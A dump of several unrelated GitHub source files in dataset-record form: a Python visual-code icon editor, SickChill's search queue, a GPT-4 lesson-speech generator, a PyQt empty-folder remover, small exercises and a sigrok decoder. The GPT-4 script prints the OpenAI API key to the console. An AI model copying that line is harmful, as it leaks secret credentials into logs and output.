0:\n # Cursor is on first input site. Remove icon and replace with entry icon\n entryIcon = self._becomeEntryIcon()\n self.window.cursor.setToText(entryIcon, drawNew=False)\n elif siteName == \"values\":\n # Cursor is on comma input. Delete if empty or previous site is empty\n listicons.backspaceComma(self, siteId, evt)\n\n def offsetOfPart(self, partId):\n width, _ = self.bodySize\n return self.sites.values[0].xOffset - width, 0\n\n def becomeEntryIcon(self, clickPos=None, siteAfter=None):\n if clickPos is not None:\n textOriginX = self.rect[0] + icon.dragSeqImage.width - 1 + \\\n self.targetWidth - 1 + icon.TEXT_MARGIN\n textOriginY = self.rect[1] + self.sites.targetIcon.yOffset\n cursorTextIdx, cursorWindowPos = icon.cursorInText(\n (textOriginX, textOriginY), clickPos, icon.globalFont, self.op + '=')\n if cursorTextIdx is None:\n return None, None\n entryIcon = self._becomeEntryIcon()\n entryIcon.setCursorPos(cursorTextIdx)\n return entryIcon, cursorWindowPos\n if siteAfter is None or siteAfter == 'values_0':\n return self._becomeEntryIcon()\n return None\n\n def _becomeEntryIcon(self):\n win = self.window\n text = self.op + '='\n valueIcons = [s.att for s in self.sites.values if s.att is not None]\n targetIcon = self.childAt(\"targetIcon\")\n if len(valueIcons) in (0, 1):\n # Zero or one argument, convert to entry icon (with pending arg if\n # there was an argument) attached to name icon\n win.requestRedraw(self.topLevelParent().hierRect(),\n filterRedundantParens=True)\n if self.parent() is not None:\n print('AugmentedAssign has parent?????')\n return\n entryIcon = entryicon.EntryIcon(initialString=text, window=win)\n if targetIcon is None:\n win.replaceTop(self, entryIcon)\n else:\n self.replaceChild(None, 'targetIcon')\n win.replaceTop(self, targetIcon)\n targetIcon.replaceChild(entryIcon, 'attrIcon')\n if len(valueIcons) == 1:\n entryIcon.appendPendingArgs([valueIcons[0]])\n else:\n # Multiple remaining arguments: convert to tuple with entry icon as\n # first element\n win.requestRedraw(self.topLevelParent().hierRect(),\n filterRedundantParens=True)\n valueIcons = [s.att for s in self.sites.values if s.att is not None]\n newTuple = listicons.TupleIcon(window=win, noParens=True)\n if targetIcon is None:\n entryIcon = entryicon.EntryIcon(initialString=text, window=win)\n newTuple.replaceChild(entryIcon, \"argIcons_0\")\n else:\n entryIcon = entryicon.EntryIcon(initialString=text, window=win)\n targetIcon.replaceChild(entryIcon, 'attrIcon')\n newTuple.replaceChild(targetIcon, 'argIcons_0')\n for i, arg in enumerate(valueIcons):\n if i == 0:\n entryIcon.appendPendingArgs([arg])\n else:\n self.replaceChild(None, self.siteOf(arg))\n newTuple.insertChild(arg, \"argIcons\", i)\n win.replaceTop(self, newTuple)\n return entryIcon\n\ndef createAssignIconFromAst(astNode, window):\n topIcon = AssignIcon(len(astNode.targets), window)\n for i, tgt in enumerate(astNode.targets):\n if isinstance(tgt, ast.Tuple) and not hasattr(tgt, 'tupleHasParens'):\n tgtIcons = [icon.createFromAst(t, window) for t in tgt.elts]\n else:\n tgtIcons = [icon.createFromAst(tgt, window)]\n topIcon.insertChildren(tgtIcons, \"targets%d\" % i, 0)\n if isinstance(astNode.value, ast.Tuple) and not \\\n hasattr(astNode.value, 'tupleHasParens'):\n valueIcons = [icon.createFromAst(v, window) for v in astNode.value.elts]\n topIcon.insertChildren(valueIcons, \"values\", 0)\n if len(valueIcons) == 1:\n topIcon.insertChild(None, \"values\", 1)\n else:\n topIcon.replaceChild(icon.createFromAst(astNode.value, window), \"values_0\")\n return topIcon\nicon.registerIconCreateFn(ast.Assign, createAssignIconFromAst)\n\ndef createAugmentedAssignIconFromAst(astNode, window):\n assignIcon = AugmentedAssignIcon(opicons.binOps[astNode.op.__class__], window)\n targetIcon = icon.createFromAst(astNode.target, window)\n assignIcon.replaceChild(targetIcon, \"targetIcon\")\n if isinstance(astNode.value, ast.Tuple):\n valueIcons = [icon.createFromAst(v, window) for v in astNode.value.elts]\n assignIcon.insertChildren(valueIcons, \"values\", 0)\n if len(valueIcons) == 1:\n assignIcon.insertChild(None, \"values\", 1)\n else:\n assignIcon.replaceChild(icon.createFromAst(astNode.value, window), \"values_0\")\n return assignIcon\nicon.registerIconCreateFn(ast.AugAssign, createAugmentedAssignIconFromAst)\n","repo_name":"markedel/python-g","sub_path":"assignicons.py","file_name":"assignicons.py","file_ext":"py","file_size_in_byte":31872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13089804508","text":"import time\nimport traceback\nfrom typing import TYPE_CHECKING\n\nfrom sickchill import logger, settings\nfrom sickchill.show.History import History\n\nif TYPE_CHECKING:\n from sickchill.oldbeard.databases.movie import Movie\n\nfrom . import common, generic_queue, search, ui\n\nBACKLOG_SEARCH = 10\nDAILY_SEARCH = 20\nFAILED_SEARCH = 30\nMANUAL_SEARCH = 40\n\nMANUAL_SEARCH_HISTORY = []\nMANUAL_SEARCH_HISTORY_SIZE = 100\n\n\nclass SearchQueue(generic_queue.GenericQueue):\n def __init__(self):\n super().__init__()\n self.queue_name = \"SEARCHQUEUE\"\n\n def is_in_queue(self, show, segment):\n for cur_item in self.queue:\n if isinstance(cur_item, BacklogQueueItem) and cur_item.show == show and cur_item.segment == segment:\n return True\n return False\n\n def is_ep_in_queue(self, segment):\n for cur_item in self.queue:\n if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.segment == segment:\n return True\n return False\n\n def is_show_in_queue(self, show):\n for cur_item in self.queue:\n if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.show.indexerid == show:\n return True\n return False\n\n def is_movie_in_queue(self, movie: \"Movie\"):\n for cur_item in self.queue:\n if isinstance(cur_item, MovieQueueItem) and cur_item.movie.pk == movie.pk:\n return True\n return False\n\n def get_all_ep_from_queue(self, show):\n ep_obj_list = []\n for cur_item in self.queue:\n if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and str(cur_item.show.indexerid) == show:\n ep_obj_list.append(cur_item)\n return ep_obj_list\n\n def pause_backlog(self):\n self.min_priority = generic_queue.QueuePriorities.HIGH\n\n def unpause_backlog(self):\n self.min_priority = 0\n\n def is_backlog_paused(self):\n # backlog priorities are NORMAL, this should be done properly somewhere\n return self.min_priority >= generic_queue.QueuePriorities.NORMAL\n\n def is_manualsearch_in_progress(self):\n # Only referenced in webserve.py, only current running manualsearch or failedsearch is needed!!\n if isinstance(self.currentItem, (ManualSearchQueueItem, FailedQueueItem)):\n return True\n return False\n\n def is_backlog_in_progress(self):\n for cur_item in self.queue + [self.currentItem]:\n if isinstance(cur_item, (BacklogQueueItem, MovieQueueItem)):\n return True\n return False\n\n def is_dailysearch_in_progress(self):\n for cur_item in self.queue + [self.currentItem]:\n if isinstance(cur_item, DailySearchQueueItem):\n return True\n return False\n\n def queue_length(self):\n length = {\"backlog\": 0, \"daily\": 0, \"manual\": 0, \"failed\": 0}\n for cur_item in self.queue + [self.currentItem]:\n if isinstance(cur_item, DailySearchQueueItem):\n length[\"daily\"] += 1\n elif isinstance(cur_item, (BacklogQueueItem, MovieQueueItem)):\n length[\"backlog\"] += 1\n elif isinstance(cur_item, ManualSearchQueueItem):\n length[\"manual\"] += 1\n elif isinstance(cur_item, FailedQueueItem):\n length[\"failed\"] += 1\n return length\n\n def add_item(self, item):\n add_item = False\n if isinstance(item, DailySearchQueueItem):\n # daily searches\n add_item = True\n elif isinstance(item, BacklogQueueItem):\n # backlog searches\n add_item = not self.is_in_queue(item.show, item.segment)\n elif isinstance(item, (ManualSearchQueueItem, FailedQueueItem)):\n # manual and failed searches\n add_item = not self.is_ep_in_queue(item.segment)\n elif isinstance(item, MovieQueueItem):\n add_item = not self.is_movie_in_queue(item.movie)\n else:\n logger.debug(\"Not adding item, it's already in the queue\")\n\n if add_item:\n super().add_item(item)\n\n\nclass DailySearchQueueItem(generic_queue.QueueItem):\n def __init__(self):\n super().__init__(\"Daily Search\", DAILY_SEARCH)\n self.success = None\n\n def run(self):\n super().run()\n\n try:\n logger.info(\"Beginning daily search for new episodes\")\n found_results = search.searchForNeededEpisodes()\n\n if not found_results:\n logger.info(\"No needed episodes found\")\n else:\n for result in found_results:\n # just use the first result for now\n logger.info(f\"Downloading {result.name} from {result.provider.name}\")\n self.success = search.snatchEpisode(result)\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n except Exception:\n logger.debug(traceback.format_exc())\n\n if self.success is None:\n self.success = False\n\n super().finish()\n self.finish()\n\n\nclass ManualSearchQueueItem(generic_queue.QueueItem):\n def __init__(self, show, segment, downCurQuality=False):\n super().__init__(\"Manual Search\", MANUAL_SEARCH)\n self.priority = generic_queue.QueuePriorities.HIGH\n self.name = f\"MANUAL-{show.indexerid}\"\n self.success = None\n self.show = show\n self.segment = segment\n self.started = None\n self.downCurQuality = downCurQuality\n\n def run(self):\n super().run()\n\n try:\n logger.info(f\"Beginning manual search for: [{self.segment.pretty_name}]\")\n self.started = True\n\n search_result = search.searchProviders(self.show, [self.segment], True, self.downCurQuality)\n\n if search_result:\n # just use the first result for now\n logger.info(f\"Downloading {search_result[0].name} from {search_result[0].provider.name}\")\n self.success = search.snatchEpisode(search_result[0])\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n\n else:\n ui.notifications.message(\"No downloads were found\", \"Couldn't find a download for {0}\".format(self.segment.pretty_name))\n\n logger.info(f\"Unable to find a download for: [{self.segment.pretty_name}]\")\n\n except Exception:\n logger.debug(traceback.format_exc())\n\n # ## Keep a list with the 100 last executed searches\n fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)\n\n if self.success is None:\n self.success = False\n\n super().finish()\n self.finish()\n\n\nclass BacklogQueueItem(generic_queue.QueueItem):\n def __init__(self, show, segment):\n super().__init__(\"Backlog\", BACKLOG_SEARCH)\n self.priority = generic_queue.QueuePriorities.LOW\n self.name = f\"BACKLOG-{show.indexerid}\"\n self.success = None\n self.show = show\n self.segment = segment\n\n def run(self):\n super().run()\n\n if not self.show.paused:\n try:\n logger.info(f\"Beginning backlog search for: [{self.show.name}]\")\n searchResult = search.searchProviders(self.show, self.segment, False)\n\n if searchResult:\n for result in searchResult:\n # just use the first result for now\n logger.info(f\"Downloading {result.name} from {result.provider.name}\")\n search.snatchEpisode(result)\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n else:\n logger.info(f\"No needed episodes found during backlog search for: [{self.show.name}]\")\n except Exception:\n logger.debug(traceback.format_exc())\n\n super().finish()\n self.finish()\n\n\nclass MovieQueueItem(generic_queue.QueueItem):\n def __init__(self, movie: \"Movie\"):\n super().__init__(\"Movie\", BACKLOG_SEARCH)\n self.priority = generic_queue.QueuePriorities.LOW\n self.name = f\"BACKLOG-{movie.tmdb_id}\"\n self.success = None\n self.movie = movie\n\n def run(self):\n super().run()\n\n if not self.movie.paused:\n try:\n logger.info(f\"Beginning backlog search for: [{self.movie.name}]\")\n settings.movie_list.search_providers(self.movie)\n for result in self.movie.results:\n # just use the first result for now\n logger.info(f\"Downloading {result.name} from {result.provider}\")\n settings.movie_list.snatch_movie(result)\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n else:\n logger.info(_(\"No needed movie results found during backlog search for: [{name}]\".format(name=self.movie.name)))\n except Exception:\n logger.debug(traceback.format_exc())\n\n super().finish()\n self.finish()\n\n\nclass FailedQueueItem(generic_queue.QueueItem):\n def __init__(self, show, segment, downCurQuality=False):\n super().__init__(\"Retry\", FAILED_SEARCH)\n self.priority = generic_queue.QueuePriorities.HIGH\n self.name = f\"RETRY-{show.indexerid}\"\n self.show = show\n self.segment = segment\n self.success = None\n self.started = None\n self.downCurQuality = downCurQuality\n\n def run(self):\n super().run()\n self.started = True\n\n try:\n for epObj in self.segment:\n History().markFailed(epObj)\n logger.info(f\"Beginning failed download search for: [{epObj.pretty_name}]\")\n\n # If it is wanted, self.downCurQuality doesnt matter\n # if it isnt wanted, we need to make sure to not overwrite the existing ep that we reverted to!\n search_result = search.searchProviders(self.show, self.segment, True)\n\n if search_result:\n for result in search_result:\n # just use the first result for now\n logger.info(f\"Downloading {result.name} from {result.provider.name}\")\n search.snatchEpisode(result)\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n else:\n pass\n # logger.info(f\"No valid episode found to retry for: [{self.segment.pretty_name}]\")\n except Exception:\n logger.debug(traceback.format_exc())\n\n # ## Keep a list with the 100 last executed searches\n fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)\n\n if self.success is None:\n self.success = False\n\n super().finish()\n self.finish()\n\n\ndef fifo(my_list, item, max_size=100):\n if len(my_list) >= max_size:\n my_list.pop(0)\n my_list.append(item)\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/search_queue.py","file_name":"search_queue.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"34329452643","text":"import os\nimport openai\nfrom dotenv import load_dotenv\nimport json\n\n#GPT4.0に質問する簡単なScript\n\n#APIキー取得して渡す\nload_dotenv()\napi_key = os.environ['OPENAI_API_KEY']\nprint(api_key)\nopenai.api_key=api_key\n\n\noperating =\\\n\"#あなたは小学校の教師です。\\\n#あなたに与えた「時間」、「学習活動」、「指導上の留意点」、「評価の観点」の項目を踏まえて、「そのセクションにおける教師の発話」を答えてください。\\\n#「学習活動」とは、授業内で生徒が達成するべき活動であり、教師の発話は学習活動が全て行えるように促すものになります。\\\n#出力する「教師の発話」とは、そのセクション内で行う学習活動や指導上の留意点の項目がすべて達成できるように、教師が生徒の前で話すような発言のことを指します。\\\n「教師の発話」では、教師は授業を聞いている生徒のことを意識し、常に生徒たちの学習状況を気にかける必要があります。\\\n例えば、「どうですか?理解できましたか?」「一度整理のために時間を取りますね。」などのように、時々教師が生徒に寄り添うような発言を入れてください。\\\nまた、あなたは生徒に好かれる教師なので、ユーモアに富んだ語りをします。\\\n#教師の発話では口調を統一してください。以下の例で挙げている文章と同じ口調で話してください。\\\n#教師の発話以外の内容は発言しないでください。\\\n#以下は「教師の発話」の例です。\\\n「みなさん、こんにちは。今日も一緒に楽しく学んでいきましょうね。さて、前回の授業では、私たちの体のどの部分が曲がるか、そしてその理由について勉強したこと、みんなは覚えていますか?\\\n手や腕がどのように動くか、一緒に思い出してみましょう。例えば、腕を曲げるとき、どの部分が動いているか覚えてる?\\\nそう、関節が動いていたよね。では、関節以外に動いている部分は何だったかな?そう、筋肉も動いているんだ。\\\nどうですか?もしわからないことがあれば、遠慮なく質問してくださいね。一度整理のために時間を取りますね。」\"\n\n\n\ndef generate_text(prompt, conversation_history):\n\n # プロンプトを会話履歴に追加\n conversation_history.append({\"role\": \"user\", \"content\": prompt})\n\n # GPT-4モデルを使用する場合\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=conversation_history\n )\n message = \"\"\n\n for choice in response.choices:\n message += choice.message['content']\n\n # 応答文を会話履歴に追加\n conversation_history.append({\"role\": \"assistant\", \"content\": message})\n return message\n\ndef openjson(filename):\n with open(\"json\\\\\"+filename,encoding='utf-8') as file:\n return (json.load(file))\n \ndef speech_generate(jsonfilename,conversation_history):\n\n lesson_data=openjson(jsonfilename)\n\n for section in lesson_data:\n print(section['時間'])\n print(f\"学習活動: {section['学習活動']}\")\n print(f\"指導上の留意点: {section['指導上の留意点']}\")\n 評価の観点 = section['評価の観点'] if section['評価の観点'] is not None else \"なし\"\n print(f\"評価の観点: {評価の観点}\")\n\n teacher_speech = generate_text(\"学習活動:\"+section[\"学習活動\"]+\"指導上の留意点:\"+section[\"指導上の留意点\"],conversation_history)\n section[\"教師の発話\"] = teacher_speech\n print(\"教師の発話\"+section[\"教師の発話\"])\n print(\"\\n\") # セクション間に空行を挿入\n\n # 新しいJSONデータとして保存\n with open('json\\\\updated_lesson_plan.json', 'w', encoding='utf-8') as file:\n json.dump(lesson_data, file, ensure_ascii=False, indent=2) \n print(\"処理終了です\")\n\n\ndef main():\n # 会話履歴を格納するためのリストを初期化\n conversation_history = []\n #指示を追加\n conversation_history.append({\"role\": \"system\", \"content\": operating})\n\n speech_generate(\"honji_tenkai.json\",conversation_history)\n\nif __name__ == \"__main__\":\n\n main()","repo_name":"moriten0318/AITeacher_python","sub_path":"JSONtoLesson.py","file_name":"JSONtoLesson.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37311508789","text":"arr = [5, 2, 3, 7, 4, 1]\nkey = int(input(\"검색할 값을 입력하세요:\"))\n\narr.append(key) #보초값 추가\ni = 0\nwhile True:\n\tif arr[i] == key:\n\t\tbreak\n\ti += 1\nif i == len(arr)-1:\n\tprint(\"not found\")\nelse:\n\tprint(f\"검색값은 {arr[i]}에 있습니다.\")\n","repo_name":"PSLeon24/DataStructure-Algorithms","sub_path":"Sentinel.py","file_name":"Sentinel.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27997362171","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nx = [\"FEBio\", \"SOniCS\", \"ACEFEM\"]\ny = [\"FEBio\", \"SOniCS\", \"ACEFEM\"]\n\nharvest = np.array([[0.0, 10.92, 14.19], \n [10.92, 0.0, 3.33], \n [14.19, 3.33, 0.0]])\n\n# FEBio x Acegn: 14,19 %\n# FEBio x Sonics: 10,92 %\n# ACEGen x Sonics: 3.33 %\n\nfig, ax = plt.subplots()\nim = ax.imshow(harvest, cmap='Blues')\n\n# Show all ticks and label them with the respective list entries\nax.set_xticks(np.arange(len(x)))\nax.set_yticks(np.arange(len(y)))\n\n# ... and label them with the respective list entries\nax.set_xticklabels(x)\nax.set_yticklabels(y)\n\n# Rotate the tick labels and set their alignment.\nplt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n# Loop over data dimensions and create text annotations.\nfor i in range(len(x)):\n for j in range(len(y)):\n text = ax.text(j, i, harvest[i, j],\n ha=\"center\", va=\"center\", color=\"w\")\n\n#ax.set_title(\"ACEGen vs FEBio vs SOniCS for Money Rivlin material with Q1 discretization\")\nfig.tight_layout()\nplt.show()","repo_name":"Sidaty1/PaperVisu","sub_path":"heatmap_sonics_acegen_febio.py","file_name":"heatmap_sonics_acegen_febio.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18955492012","text":"#solution_python1_chapter05_function.py\r\n\r\ndef outer_function(operation, subtract_this):\r\n\t\"takes an operation and a number to subtract\"\r\n\tthing_to_subtract=subtract_this\r\n\tdef add_me(a, b):\r\n\t\t\"adds two numbers\"\r\n\t\treturn (a + b) \r\n\t\r\n\tdef mult_me(a, b):\r\n\t\t\"multiplies two numbers\"\r\n\t\treturn a * b \r\n\t\r\n\t#a dict of possibilities\r\n\top_dict={\"addition\": add_me,\r\n\t \"multiplication\": mult_me}\r\n\t\r\n\r\n\tdef inner_function(a,b):\r\n\t\t\"inner-most function\"\r\n\t\tfunc=op_dict.get(operation, None)\r\n\t\tnonlocal thing_to_subtract\r\n\t\tfs= \"You asked me to perform {} on {} and {} then subtract {}. I got {}.\"\r\n\t\tif func:\r\n\t\t\tprint(fs.format(operation, a, b, subtract_this, func(a,b)-subtract_this))\r\n\t\telse:\r\n\t\t\tprint(\"The operation you provided {} is not yet supported\")\r\n\r\n\treturn inner_function\t\r\n\r\n\r\nexecute_this_with_two_args=outer_function(\"addition\", 10)\r\nexecute_this_with_two_args(2,3)\r\n\r\n\r\n\r\n","repo_name":"pbarton666/PES_Python_examples_and_solutions","sub_path":"solution_python1_chapter05_function.py","file_name":"solution_python1_chapter05_function.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1689135213","text":"from PyQt5.QtWidgets import (QWidget, QSizePolicy, QVBoxLayout, QPushButton, QSplitter, QHBoxLayout,\n QFrame, QLabel,\n QTableWidget, QAbstractItemView, QAbstractScrollArea, QHeaderView,\n QFileDialog, QListView,\n QTreeView, QTableWidgetItem)\nfrom PyQt5.QtCore import Qt, QDir\nfrom assets import styles\nfrom ui.Widgets import Widgets\nfrom backie.Empty import Empty\n\n\nclass MainUI(QWidget):\n \"\"\"\n Components of Main UI displayed when app opens up\n \"\"\"\n\n def __init__(self, parent=None):\n try:\n super(MainUI, self).__init__(parent)\n # self.setMinimumSize(800, 600)\n self.selected_folders = []\n self.folder_table_contents = []\n self.empty_folders = []\n self.empty = Empty()\n self.widgets = Widgets()\n self.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)\n self._initialize_components()\n self.setWindowTitle('Delete Empty')\n except Exception as e:\n print(e)\n\n def _initialize_components(self):\n layout = QVBoxLayout()\n splitter = QSplitter(Qt.Horizontal)\n\n left_frame = self._initialize_left_frame()\n right_frame = self._initialize_right_frame()\n splitter.addWidget(left_frame)\n splitter.addWidget(right_frame)\n layout.addWidget(splitter)\n self.setLayout(layout)\n\n def new_qframe(self):\n frame = QFrame()\n frame.setStyleSheet(styles.FRAME_PAGE_STYLE)\n return frame\n\n def _initialize_left_frame(self):\n frame = self.new_qframe()\n frame.setMaximumWidth(200)\n splitter = QSplitter(Qt.Vertical)\n left_top_frame = self._initialize_left_top_frame()\n left_bottom_frame = self._initialize_left_bottom_frame()\n splitter.addWidget(left_top_frame)\n splitter.addWidget(left_bottom_frame)\n layout = QVBoxLayout()\n\n layout.addWidget(splitter)\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_frame(self):\n frame = self.new_qframe()\n layout = QVBoxLayout()\n splitter = QSplitter(Qt.Vertical)\n right_top_frame = self._initialize_right_top_frame()\n right_middle_frame = self._initialize_right_middle_frame()\n right_bottom_frame = self._initialize_right_bottom_frame()\n\n splitter.addWidget(right_top_frame)\n splitter.addWidget(right_middle_frame)\n splitter.addWidget(right_bottom_frame)\n layout.addWidget(splitter)\n frame.setLayout(layout)\n return frame\n\n def _initialize_left_top_frame(self):\n frame = self.new_qframe()\n frame.setMaximumHeight(50)\n layout = QHBoxLayout()\n layout.setAlignment(Qt.AlignCenter)\n select_folder_button = QPushButton(\"Select Folder\")\n select_folder_button.setStyleSheet(styles.DIALOG_BUTTON)\n select_folder_button.setMaximumWidth(160)\n select_folder_button.clicked.connect(self.select_button_clicked)\n\n layout.addWidget(select_folder_button)\n frame.setLayout(layout)\n return frame\n\n def _initialize_left_bottom_frame(self):\n frame = self.new_qframe()\n layout = QVBoxLayout()\n\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_top_frame(self):\n frame = self.new_qframe()\n frame.setMaximumHeight(50)\n layout = QHBoxLayout()\n layout.setAlignment(Qt.AlignCenter)\n header = QLabel('Empty Folders')\n header.setStyleSheet(styles.LABEL_HEADER)\n layout.addWidget(header)\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_middle_frame(self):\n frame = self.new_qframe()\n layout = QHBoxLayout()\n self._initialize_folder_table_view()\n\n layout.addWidget(self.folder_list_view)\n frame.setLayout(layout)\n return frame\n\n def _initialize_right_bottom_frame(self):\n frame = self.new_qframe()\n layout = QHBoxLayout()\n layout.setAlignment(Qt.AlignTop)\n layout.setSpacing(50)\n self.delete_all_button = QPushButton('Delete All')\n self.delete_selected_button = QPushButton('Delete Selected')\n self.delete_all_button.setMaximumWidth(160)\n self.delete_selected_button.setMaximumWidth(160)\n self.delete_selected_button.setEnabled(False)\n self.delete_all_button.setEnabled(False)\n self.delete_all_button.setStyleSheet(styles.DIALOG_BUTTON)\n self.delete_selected_button.setStyleSheet(styles.DIALOG_BUTTON)\n self.delete_all_button.clicked.connect(self.delete_all_button_clicked)\n\n layout.addWidget(self.delete_all_button)\n layout.addWidget(self.delete_selected_button)\n\n frame.setLayout(layout)\n\n return frame\n\n def _initialize_folder_table_view(self):\n self.folder_list_view = self._get_table_widget()\n self.folder_list_view.setColumnCount(4)\n self.folder_list_view.setHorizontalHeaderLabels(\n ['Folder Name', 'Path', 'Created time', 'Deleted time'])\n self.folder_list_view.setSelectionBehavior(QAbstractItemView.SelectRows)\n # self.folder_list_view.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.folder_list_view.itemSelectionChanged.connect(self.delete_select_button_toggle)\n\n def delete_select_button_toggle(self):\n self.selected_empty_folders = self.folder_list_view.selectedIndexes()\n if self.selected_empty_folders:\n self.delete_selected_button.setEnabled(True)\n print(dir(self.selected_empty_folders[0]))\n print(self.selected_empty_folders[0].row)\n print(self.selected_empty_folders[0].column)\n print(self.selected_empty_folders[0].child)\n print(self.selected_empty_folders[0].flags)\n print(self.selected_empty_folders[0].data)\n print(self.selected_empty_folders[0].internalId)\n print(self.selected_empty_folders[0].internalPointer)\n print(self.selected_empty_folders[0].model)\n print(self.selected_empty_folders[0].parent)\n print(self.selected_empty_folders[0].sibling)\n\n else:\n self.delete_selected_button.setEnabled(False)\n print(self.selected_empty_folders)\n\n def _get_table_widget(self):\n table_widget = QTableWidget()\n table_widget.setStyleSheet(styles.TABLE_WIDGET_STYLE)\n table_widget.verticalHeader().setVisible(False)\n table_widget.horizontalHeader().setDefaultAlignment(Qt.AlignCenter)\n table_widget.verticalScrollBar().setStyleSheet(styles.SCROLL_AREA)\n table_widget.horizontalHeader().setHighlightSections(False)\n table_widget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n table_widget.horizontalHeader().setStretchLastSection(True)\n\n return table_widget\n\n def delete_all_button_clicked(self):\n print(self.folder_table_contents)\n if self.empty.delete_folders(self.empty_folders):\n self.widgets.get_message_box(\"Deleted Successfully\").exec()\n\n def delete_selected_button_clicked(self):\n pass\n\n def select_button_clicked(self):\n try:\n print('Folder')\n self._get_file_dialog()\n if self.selected_folders:\n print(self.selected_folders)\n self.folder_table_contents, self.empty_folders = self.empty.get_empty_folders_list(\n self.selected_folders)\n print(self.folder_table_contents)\n if self.folder_table_contents:\n self.delete_all_button.setEnabled(True)\n self.generate_folder_list_view()\n else:\n message_box = self.widgets.get_message_box(\"No Empty folders\")\n message_box.exec()\n except Exception as e:\n print(e)\n\n def generate_folder_list_view(self):\n self.folder_list_view.setRowCount(len(self.folder_table_contents))\n index = 0\n for folder in self.folder_table_contents:\n self.folder_list_view.setItem(index, 0, QTableWidgetItem(folder[0]))\n self.folder_list_view.setItem(index, 1, QTableWidgetItem(folder[1]))\n self.folder_list_view.setItem(index, 2, QTableWidgetItem(folder[2]))\n self.folder_list_view.setItem(index, 3, QTableWidgetItem(folder[3]))\n index += 1\n self.folder_list_view.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(1, QHeaderView.Interactive)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(2, QHeaderView.Interactive)\n self.folder_list_view.horizontalHeader().setSectionResizeMode(3, QHeaderView.Interactive)\n\n def _get_file_dialog(self):\n self.file_dialog = QFileDialog()\n options = QFileDialog.Options()\n options |= QFileDialog.ShowDirsOnly\n options |= QFileDialog.DontUseNativeDialog\n self.file_dialog.setFileMode(QFileDialog.DirectoryOnly)\n self.file_dialog.setOptions(options)\n self.file_dialog.setWindowTitle(\"Select Folder\")\n self.file_dialog.setDirectory(QDir.home())\n self.file_dialog.setWindowFlag(Qt.WindowContextHelpButtonHint, False)\n self.file_dialog.findChildren(QListView)[0].setSelectionMode(\n QAbstractItemView.ExtendedSelection)\n self.file_dialog.findChildren(QTreeView)[0].setSelectionMode(\n QAbstractItemView.ExtendedSelection)\n # self.file_dialog.setFixedSize(800, 600)\n if self.file_dialog.exec():\n self.selected_folders = self.file_dialog.selectedFiles()\n","repo_name":"nambi0915/empty","sub_path":"ui/MainUI.py","file_name":"MainUI.py","file_ext":"py","file_size_in_byte":9893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19115861737","text":"from .cube import *\nfrom display import *\n\ndef autoscroll(layer_generator, direction = Direction.BACK):\n c = Cube()\n while True:\n for val in layer_generator:\n if type(val) is bool:\n # A boolean means clear the cube and finish before continuing.\n for i in range(c.size):\n scroll_back(c, direction)\n yield c.copy()\n yield True\n continue\n scroll_back(c, direction, new_layer = val)\n yield c.copy()\n\ndef scroll_back(cube, direction, new_layer = Colour.BLACK):\n for i in range(cube.size - 1):\n cube.fill_layer(direction, i, cube.get_layer(direction, i + 1))\n cube.fill_layer(direction, cube.size - 1, new_layer)\n\n","repo_name":"abryant/LED-Cube","sub_path":"visuals/autoscroll.py","file_name":"autoscroll.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"472730820","text":"import sigrokdecode as srd\n\n# sigrok-cli --driver saleae-logic16 --config samplerate=500k --channels 14=RX,3 --continuous\n# -P uart:rx=RX,uart_logger:file_name=1.bin\n# -P uart:rx=3,uart_logger:file_name=2.bin\n# -A uart_logger\n\n\nclass Decoder(srd.Decoder):\n api_version = 3\n id = 'uart_logger'\n name = 'uart_logger'\n longname = 'uart_logger'\n desc = 'uart_logger'\n license = 'lgpl'\n inputs = ['uart']\n outputs = []\n tags = ['Embedded/industrial']\n options = (\n {'id': 'file_name', 'desc': 'binary file to save data from uart', 'default': ''},\n )\n annotations = (\n ('b', 'byte'),\n ('n', 'num'),\n\n )\n annotation_rows = (\n ('byte_output', 'ReadBytesOutput', (0, 